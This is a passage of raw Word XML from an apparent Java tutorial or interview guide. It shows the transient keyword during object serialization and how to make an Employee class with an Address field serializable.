          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AB2B53"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35A9B00C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D38C3C"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> getSalary</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53B7A566"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47511E75"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0E0A57A2"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514B3AB" w14:textId="5EC1BA4A"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TestSerialization</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063D4EB0"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stat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main</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String</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arg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throw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Exception</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790065D0"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> emp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Employee</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John"</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50000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EDF64"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2FDCB880"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Serialize the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419ED0AE"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FileOutputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileOut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FileOutputStream</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employee.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B8764F"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ObjectOutputStream</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ou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ObjectOutputStream</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fileOut</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F7909"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writeObjec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emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F31AED"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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145CA29C"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file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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6EA1A"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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDFC077"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Deserialize the object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7409E"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FileInputStream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fileIn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FileInputStream</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employee.ser"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6A764"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ObjectInputStream</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ObjectInputStream</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fileIn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7097CD"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deserializedEmp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Employe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readObject</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C393C"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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACA19E"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fileIn</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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0F6C0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7011C"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Output the deserialized object's fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20827574"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Name: "</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deserializedEmp</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getName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0944B"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Salary: "</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deserializedEmp</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getSalary</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Will be 0 since it's transient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA5E115" w14:textId="77777777"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5937E666" w14:textId="15E7FC0C" w:rsidR="00F54E48" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C126C" w14:textId="77777777" w:rsidR="00F54E48" w:rsidRPr="00CE4B95" w:rsidRDefault="00F54E48" w:rsidP="00F54E48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> field is marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, so when the object is serialized and then deserialized, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>salary</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> field will not retain its value and will default to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the deserialized object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9683B3" w14:textId="1BC0F389" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F54E48">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1B36AE14">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D01260D" w14:textId="799A51E8" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="000352E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc196307492"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can I m</w:t>
      </w:r>
      <w:r w:rsidR="006F7750" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ake</w:t>
      </w:r>
      <w:r w:rsidR="00250003" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> below</w:t>
      </w:r>
      <w:r w:rsidR="006F7750" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Employee class as Serializable class?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="40CC8604" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</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Employe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p>
    <w:p w14:paraId="4570C45C" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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nam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p>
    <w:p w14:paraId="6BE04F34" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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empld</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p>
    <w:p w14:paraId="44E3BF78" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dob</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p>
    <w:p w14:paraId="42A38470" w14:textId="63148563" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad</w:t>
      </w:r>
      <w:r w:rsidR="003155C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>res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p>
    <w:p w14:paraId="6376B750" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539E277" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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p>
    <w:p w14:paraId="6CB14D47" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A0114" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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Addres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p>
    <w:p w14:paraId="125F4269" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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linel</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p>
    <w:p w14:paraId="2D521519" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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line2</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p>
    <w:p w14:paraId="5304FC58" w14:textId="41001DC0" w:rsidR="006F7750" w:rsidRPr="00CE4B95"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A59AB5" w14:textId="77777777" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750" w:rsidP="006F7750">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501D75EC" w14:textId="1AE8CBD2" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715E114B" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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io</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Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA6BA6" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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util</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30908D75" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348F864A" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F94FC" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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Employe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mplement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erializabl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33A341B1" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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stat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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</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Optional, but good practice to define</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191BFB58" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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61862E5B" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AD30E9" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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empld</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A46B1" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B6CB72" w14:textId="595D9ED3" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> addres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p>
    <w:p w14:paraId="43A79168" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E821714" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC1B01" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E64CCCE" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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Addre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mplement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erializabl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5C11D3B3" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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stat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final</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long</w:t>
      </w:r>
